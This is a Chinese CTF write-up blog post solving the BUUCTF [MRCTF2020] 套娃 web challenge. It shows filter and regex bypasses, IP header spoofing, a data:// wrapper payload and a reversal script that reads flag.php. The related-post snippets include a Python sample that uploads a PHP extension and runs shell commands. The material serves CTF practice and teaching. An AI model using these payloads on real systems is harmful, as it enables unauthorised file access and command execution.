BUUCTF WEB 套娃

最新推荐文章于 2023-04-08 14:27:25 发布
最新推荐文章于 2023-04-08 14:27:25 发布
阅读量3.1k 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/122728560
版权

前面的几题攻防世界也有,而且buuctf换成k8s管理以后和纯原生的docker环境又不一样了,有些地方我百度了也没百度到。。。。
打开场景,看见一段被注释掉的源码

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->

过滤了_,b_u_p_t参数要不是23333且又要是23333,经典矛盾了属于是,其实很好办!==是强不等,以23333开头就好了
然后就是这个正则匹配,常用思路%0A绕过正则匹配,这样第二行的过滤就完全绕过了,我也疑惑过我在%0A之后明明也可以带其他东西的,为什么不行
come on,人家只放了部分源码,谁知道后面还有没有过滤了?
关于正则绕过的常规思路,可以看看这位师傅的,总结的还是很好的
https://blog.csdn.net/qq_40327508/article/details/108842617
至于我们要带b_u_p_t过去,而_被过滤了,怎么办呢。经典拼接,空格或者.在php处理时会被自动替换成_
回显FLAG is in secrettw.php ,访问吧Flag is here~But how to get it?Local access only!
Sorry,you don’t have permission! Your ip is :sorry,this way is banned!
审计页面代码,一串神秘代码??好吧,一看就是密码学的知识,之前在bugku里面刷到过jsfuck,解码
http://www.hiencode.com/jsfuck.html
结果:alert(“post me Merak”
带个参数过去看看。传回来源码

include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

下面就卡住了,我是不知道这个getIp()的绕过思路是哪来的,takeip.php的源码也拿不到。我们就权当可以拿到吧,或者说是试出来的?
Client-Ip:127.0.0.1,发现IP的过了,23333是我们自己带过去的,不谈,文件内容要是todat is a happy day
服务器端是肯定没有了,好在data://或者php://input之类的伪协议可以由我们指定文件的内容,而php://input需要post参数,所以本题不考虑
用data://来过这个限制data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=
最后只有一个change要过了,要保证change过后的参数是flag.php
开始看逻辑

function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}

写脚本,一个很简单的加密,倒过来就行了

<?php
$target="flag.php";
for($i=0;$i<strlen($target);$i++){
 $re .= chr ( ord ($target[$i]) - $i*2 );
}
$file=base64_encode($re);
echo $file;
?>

得到结果:
ZmpdYSZmXGI=
成功拿到flag
总结一下,第二个的payload:2333=data://text/plain;base64,dG9kYXQgaXMgYSBoYXBweSBkYXk=&file=ZmpdYSZmXGI=
burp抓包加client-ip头,127.0.0.1成功
参考视频链接:https://www.bilibili.com/video/BV15S4y1y754/

显哥无敌
关注
专栏目录
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 3096
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF web [MRCTF2020]套娃 1 wp
Whaocai的博客
08-06 530
考点: ①$SERVER数组的各个元素的含义 ②%0a绕过preg_match() ③data://text/plain;base64的利用 进去之后还是先看看有没有robots.txt文件(自己做题的习惯),发现页面并不跳转,猜测应该是index.php中有header在限制 于是查看源码,看到一段php代码 //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($qu
wp-buuctf-禁止套娃(无参绕过)【多方法】
bin789456的博客
11-08 2173
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
buuctf [MRCTF2020]套娃
m0_65766842的博客
04-08 266
第二个if要求get传的参不能等于2333且传的参结尾开头中间都是2333,在23333结尾加个换行符url编码为%0a 即可绕过。第一个if过滤了_和url编码的%5f 解码后也是_ ,PHP会将传参中的空格( )、小数点(.)自动替换成下划线。通过查询资料和对比,知道了这是一个jQuery事件,并且使用change()的办法来做题。简而言之就是变量改变会有提醒,因为我们绕过不能有提醒所以上传的v和file相同。通过查询资料,我们可以知道被注释的是一串jsfuck的的编码。我们进行传参之后得到以下代码。
MRCTF web套娃 write up
freerats的博客
03-31 683
打开环境查看源代码,发现让我们传b_u_p_t,但是url里不能出现_和%5f,%5f和%5F是一样的,所以直接用%5F绕过 &nbsp &nbsp23333$ 在正则表达式里$可以表示结束位置,但也可以匹配换行符,因此这里可以用23333%0a来绕过 &nbsp&nbsp之后可以看到提示信息,说flag在secrettw.php里,打开页面 在源码处发现一...
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF,不过如此1
网安小趴菜
09-20 437
BUUCTF Web [GXYCTF2019]禁止套娃1 & [BJDCTF2020]ZJCTF,不过如此1
BUUCTF WEB [GXYCTF2019]禁止套娃
Y1da的博客
04-22 1540
BUUCTF WEB [GXYCTF2019]禁止套娃 没有任何提示,使用dirsearch扫描 # Dirsearch started Fri Apr 22 02:23:09 2022 as: ./dirsearch.py -u http://ffd94bba-98ea-4150-9103-09306827d709.node4.buuoj.cn:81/ --delay=0.5 -t 3 301 185B http://ffd94bba-98ea-4150-9103-09306827d709
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3763
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF-WEB
ccfly1012的博客
11-02 3909
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF web(五)
m0_46616663的博客
11-21 966
[GXYCTF2019]BabyUpload 传呗,先传个php一句话 检测后缀了,大小写也绕不过去 试了下别的后缀也不大行 抓包康康 抓包改后缀和content-type倒是能绕过,但是上传的文件依旧是一个jpg而不会被当作php解析 嘶。。。欸?等等 那还等啥,传它! 直接传也是不行的,抓包改下content-type 之前已经传过马了,连下试试 芜湖!flag在根路径里 拿来吧你! [BUUCTF 2018]Online Tool $host = escapeshellarg($h
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BUUCTF__web题解合集(十一)
风过江南乱的博客
10-04 1359
1、[GKCTF2020]EZ三剑客-EzWeb 2、[BJDCTF 2nd]elementmaster 3、[MRCTF2020]套娃 4、[FBCTF2019]RCEService 5、[WUSTCTF2020]颜值成绩查询
BUUCTF WEB 禁止套娃1
qq_41696858的博客
12-08 753
打开场景,空荡荡的,啥也没有 正常思路,扫目录,dirsearch有防扫,dirmap 扫出来.git,源码泄露没跑了 GitHacker跑出来是空文件,我也不知道为啥 GitHack看看能不能找出什么有用的东西,跑出来index.php的源码 源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|ph
[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃
crispr的博客
03-17 1347
[CISCN2019 总决赛 Day2 Web1]Easyweb 0X01 前言 现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。 0X02 正文 发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。 一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录 dirsearch -u "http://1606db13-...
but only one is allowed. 重复处理跨域请求
m0_59685103的博客
08-10 2769
but only one is allowed. 重复处理跨域请求
网络安全攻防实验室通关教程-基础篇
热门推荐
黑面狐
10-17 1万+
网络安全实验室地址传送门:http://hackinglab.cn 一、key在哪里? 第一题基本是签到题。 提示:key就在这里,你能找到它吗? 右键打开网页源码,在注释中找到flag   一般告诉我们key就在这里的话,我们一般会查看网页源码,如果没有就抓取数据包查看。   二、再加密一次你就得到key了 加密之后的数据为xrlvf23xfqwsxsqf 从题目意思知道  
CTF-WEB-01-localhost access only!!
weixin_30402085的博客
07-30 3210
题目地址:http://http://web.jarvisoj.com:32774/ 0x01 题目分析   localhost access only字面意思只允许本机登录   考虑添加header:             X-Forward-For 127.0.0.1     ...
从sql注入到xslt再到xxe的一道ctf题目
蚁景网安学院
03-30 663
点击上方“合天智汇”,选择“置顶公众号”有内涵的干货文章第一时间送达!本文作者:一叶飘零投稿活动:重金悬赏 | 合天原创投稿等你来!1前记最近比较闲,看到一道web题目,学到了一些知识,...
buuctf 套娃 解析
qq_73722777的博客
04-07 603
其中query的目的是获得所有上传的数据,第一个if过滤了“_”和%5f(也就是url编码的“_”),第二个if使得变量b_u_p_t要不等于23333并且后面的preg函数要使变量b_u_p_t等于23333。于是payload的思路为:通过满足ip和变量2333的需求,从而在file_get_content()函数中打开flag.php,得到flag。实现的是将字符串v进行base64编码后,对每一个字符进行【ascii编码+i*2】的处理,最终结果输出到字符串re中。再进行base64加密,得到。
ctfshow套娃shell
最新发布
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`php ext_skel.php --ext ctfshow --std`来生成该扩展的目录。 2. 进入生成的目录,并编辑.c文件,根据需要进行修改。 3. 执行以下命令来编译和安装扩展:`phpize ./configure make && make install`。编译完成后,会告知具体的扩展安装位置。 4. 通过发送POST请求,使用CTFSHOW套娃shell来写入并执行命令。示例代码如下: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'file': '/usr/local/lib/php/extensions/no-debug-non-zts-20180731/mysqli.so', 'content': open('ctfshow.so', 'rb').read()} requests.post(url + '?a=write', data=data) requests.get(url + '?a=run') ``` 5. 使用CTFSHOW套娃shell执行命令。可以使用以下命令示例: ```python import requests url = "http://690602f6-e0b4-4a2b-b0e0-b36c4e383275.challenge.ctf.show/" data = {'cmd': 'cat /f*'} requests.post(url + '?a=shell', data=data) ``` 这样,您就可以使用CTFSHOW套娃shell来执行命令并获取所需的结果了。请注意,使用套娃shell存在安全风险,应仅在合法和授权的情况下使用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFSHOW 常用姿势篇(811-820)](https://blog.csdn.net/miuzzx/article/details/124038567)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值